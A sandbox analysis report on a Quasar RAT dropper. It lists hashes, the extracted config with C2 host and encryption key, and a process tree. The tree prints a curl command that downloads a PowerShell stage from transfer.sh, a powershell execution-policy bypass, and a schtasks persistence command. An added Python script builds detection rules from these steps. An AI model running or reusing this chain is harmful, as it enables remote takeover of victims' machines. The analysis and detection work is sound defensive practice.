Analysis
- max time kernel: 143s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17/01/2023, 08:26
Static task: static1
Behavioral task: behavioral1
- Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
- Resource: win10v2004-20221111-en
General
- Target: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
- Size: 547KB
- MD5: b0ab211e83a23d58e1322e4d2d6f0a96
- SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
- SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
- SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
- SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Extracted: quasar
- version: 1.4.0
- Office04 (unlabelled in the extractor output; this position holds Quasar's campaign tag)
- C2: ghcc.duckdns.org:4782
- a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b (GUID; in Quasar client configs this field is the mutex name)
- encryption_key: B0326395AC2D48856CAE22978A087DF5DCF5816D
- install_name: Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: Update (the same name is used for the scheduled task created in the process tree below)
- subdirectory: SubDir
Signatures
Quasar payload (2 IoCs)
- resource: behavioral2/memory/2880-144-0x0000000000400000-0x0000000000484000-memory.dmp, yara rule: family_quasar
- resource: behavioral2/memory/2880-145-0x000000000047E74E-mapping.dmp, yara rule: family_quasar
Both matches are in the memory of PID 2880 (RegAsm.exe), the process that powershell.exe wrote to and set a thread context in (see below); the image region 0x400000-0x484000 is where the Quasar client was placed.
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation, process: cmd.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation, process: WScript.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"", process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
- Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce, process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
This RunOnce value is the cleanup entry written by the Windows IExpress/wextract self-extractor (IXP000.TMP is its extraction directory): it deletes the temporary directory at next logon rather than starting the payload. The payload's own persistence is the "Update" scheduled task recorded further down.
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 21: api.ipify.org
- flow 22: api.ipify.org
Suspicious use of SetThreadContext (1 IoC)
- PID 3572 (powershell.exe) set the thread context of PID 2880 (RegAsm.exe), target procid 93
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drives. The sandbox's generic description for this signature calls this likely ransomware behaviour; nothing else in this report shows file encryption, and the extracted configuration identifies the payload as the Quasar remote-access trojan, which enumerates drives for its file manager.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 1952: schtasks.exe
Modifies registry class (1 IoC)
- Key created: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings, process: cmd.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
- PID 3572: powershell.exe
- PID 3572: powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
- Token: SeDebugPrivilege, PID 3572: powershell.exe
- Token: SeDebugPrivilege, PID 2880: RegAsm.exe
Suspicious use of SetWindowsHookEx (1 IoC)
- PID 2880: RegAsm.exe
Suspicious use of WriteProcessMemory (27 IoCs, grouped by writer and target)
- PID 4644 ({437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe) wrote to PID 4112, target procid 82: 2 writes
- PID 4112 (cmd.exe) wrote to PID 3752, target procid 84: 2 writes
- PID 3752 (WScript.exe) wrote to PID 2132, target procid 85: 2 writes
- PID 2132 (cmd.exe) wrote to PID 4320, target procid 87: 2 writes
- PID 4320 (cmd.exe) wrote to PID 1852, target procid 88: 2 writes
- PID 3752 (WScript.exe) wrote to PID 364, target procid 89: 2 writes
- PID 364 (cmd.exe) wrote to PID 632, target procid 91: 2 writes
- PID 632 (cmd.exe) wrote to PID 3572, target procid 92: 2 writes
- PID 3572 (powershell.exe) wrote to PID 2880, target procid 93: 8 writes
- PID 2880 (RegAsm.exe) wrote to PID 1952, target procid 95: 3 writes
The pairs with two writes are ordinary parent-to-child process creation. The eight writes from powershell.exe into RegAsm.exe, together with the SetThreadContext call above and the family_quasar match in that process's 0x400000-0x484000 region, are the injection of the Quasar client into a freshly started RegAsm.exe.
Processes
- C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe (PID 4644)
  command line: "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
  signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (PID 4112)
    command line: cmd /c new.vbs
    signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WScript.exe (PID 3752)
      command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
      signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (PID 2132)
        command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe (PID 4320)
          command line: cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\curl.exe (PID 1852)
            command line: curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      - C:\Windows\System32\cmd.exe (PID 364)
        command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe (PID 632)
          command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3572)
            command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 2880)
              command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
              - C:\Windows\SysWOW64\schtasks.exe (PID 1952)
                command line: "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f
                signatures: Creates scheduled task(s)

Reading the tree: the submitted file is a self-extracting package (the IXP000.TMP directory and the wextract_cleanup0 RunOnce value are IExpress/wextract artifacts) that runs new.vbs. The script fetches a second-stage PowerShell script from transfer.sh into the user's Roaming profile and runs it with the execution policy bypassed. That script starts RegAsm.exe with no arguments and injects the Quasar client into it (SetThreadContext plus eight WriteProcessMemory calls, family_quasar match in the 0x400000-0x484000 region). The injected client then registers a logon task named "Update" (the startup_key from the extracted config) with the highest run level. Note that the task action is the bare RegAsm.exe path rather than the configured SubDir\Client.exe; as recorded, the task alone would start a clean RegAsm.exe, so an install directory and any other persistence should be checked on an infected host rather than relying on this single task.
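The chain above is a good candidate for a process-telemetry detection, and the following is an added example written for this page rather than code from the sandbox or from Quasar. It replays Sysmon-style process-creation events constructed from the report's tree (same PIDs, images and command lines; the dropper's parent PID 1 is invented) through four rules that each capture one link of the chain: curl writing a script under AppData, powershell.exe running an AppData .ps1 with the execution policy bypassed, a .NET utility started with no arguments by a script host (the hollowing target), and a schtasks /create with /rl HIGHEST whose action is such a utility. The rule names, the host lists and the AppData path test are this example's own choices, not anything the report defines.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon event 1 or an EDR equivalent)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # command line as logged


# Constructed sample input: the process tree from this report, with the same PIDs,
# images and command lines; the parent of the dropper (ppid 1) is invented.
SAMPLE_EVENTS = [
    ProcEvent(4644, 1, r"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"'),
    ProcEvent(4112, 4644, r"C:\Windows\SYSTEM32\cmd.exe", "cmd /c new.vbs"),
    ProcEvent(3752, 4112, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"'),
    ProcEvent(2132, 3752, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1'),
    ProcEvent(4320, 2132, r"C:\Windows\system32\cmd.exe",
              r"cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"),
    ProcEvent(1852, 4320, r"C:\Windows\system32\curl.exe",
              r"curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"),
    ProcEvent(364, 3752, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1'),
    ProcEvent(632, 364, r"C:\Windows\system32\cmd.exe",
              r"cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"),
    ProcEvent(3572, 632, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"),
    ProcEvent(2880, 3572, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(1952, 2880, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f'),
]

# Assumed lists for this example; extend them for your own environment.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
DROPPED_EXT = (".ps1", ".vbs", ".js", ".bat", ".exe", ".dll")
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def curl_drop_to_appdata(ev, parent):
    """curl writing a script or binary under the user's AppData tree (-o / --output)."""
    if basename(ev.image) != "curl.exe":
        return False
    t = tokens(ev.cmdline)
    return any(t[i].lower() in ("-o", "--output") and USER_WRITABLE.search(t[i + 1])
               and t[i + 1].lower().endswith(DROPPED_EXT) for i in range(len(t) - 1))


def powershell_bypass_appdata_script(ev, parent):
    """powershell with -ExecutionPolicy Bypass (any prefix of 3+ chars, or -ep) running a .ps1 from AppData."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    t = [x.lower() for x in tokens(ev.cmdline)]
    bypass = any((t[i] == "-ep" or (len(t[i]) >= 3 and "-executionpolicy".startswith(t[i])))
                 and t[i + 1] == "bypass" for i in range(len(t) - 1))
    return bypass and any(USER_WRITABLE.search(x) and x.endswith(".ps1") for x in t)


def dotnet_host_no_args_from_script_host(ev, parent):
    """A .NET utility started with no arguments by a script host does nothing useful on its
    own; combined with the parent's SetThreadContext/WriteProcessMemory it is a hollowing target."""
    return (basename(ev.image) in DOTNET_HOSTS and len(tokens(ev.cmdline)) == 1
            and parent is not None and basename(parent.image) in SCRIPT_HOSTS)


def schtasks_highest_dotnet_host(ev, parent):
    """schtasks /create ... /rl HIGHEST whose action (/tr) is a .NET utility."""
    if basename(ev.image) != "schtasks.exe":
        return False
    t = [x.lower() for x in tokens(ev.cmdline)]
    if "/create" not in t:
        return False
    opts = {t[i]: t[i + 1] for i in range(len(t) - 1) if t[i].startswith("/")}
    return opts.get("/rl") == "highest" and basename(opts.get("/tr", "")) in DOTNET_HOSTS


RULES = [curl_drop_to_appdata, powershell_bypass_appdata_script,
         dotnet_host_no_args_from_script_host, schtasks_highest_dotnet_host]


def detect(events):
    """Return (rule_name, pid) for every event that matches a rule, in event order."""
    by_pid = {e.pid: e for e in events}
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES
            if rule(ev, by_pid.get(ev.ppid))]


def ancestry(events, pid):
    """Image basenames from `pid` up to the root of the recorded tree."""
    by_pid, chain = {e.pid: e for e in events}, []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for name, pid in detect(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}  chain: {' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Each rule fires on exactly one process of the sample tree (PIDs 1852, 3572, 2880 and 1952), and ancestry() walks a hit back to the dropper so an analyst sees the whole chain rather than four isolated alerts. The dotnet_host rule deliberately requires both an argument-less command line and a scripting-host parent; RegAsm.exe with a real assembly argument, launched by an installer, will not match.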
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 300.0MB
  MD5: f7e7099eea0cc25fc49d04cd53c573a1
  SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
  SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
  SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074
- Filesize: 5.1MB
  MD5: 970aca768e68faa580f758a1a379686b
  SHA1: 6a93921485cbd83382eb5a47315b1f0a67bcf684
  SHA256: 6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
  SHA512: 66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f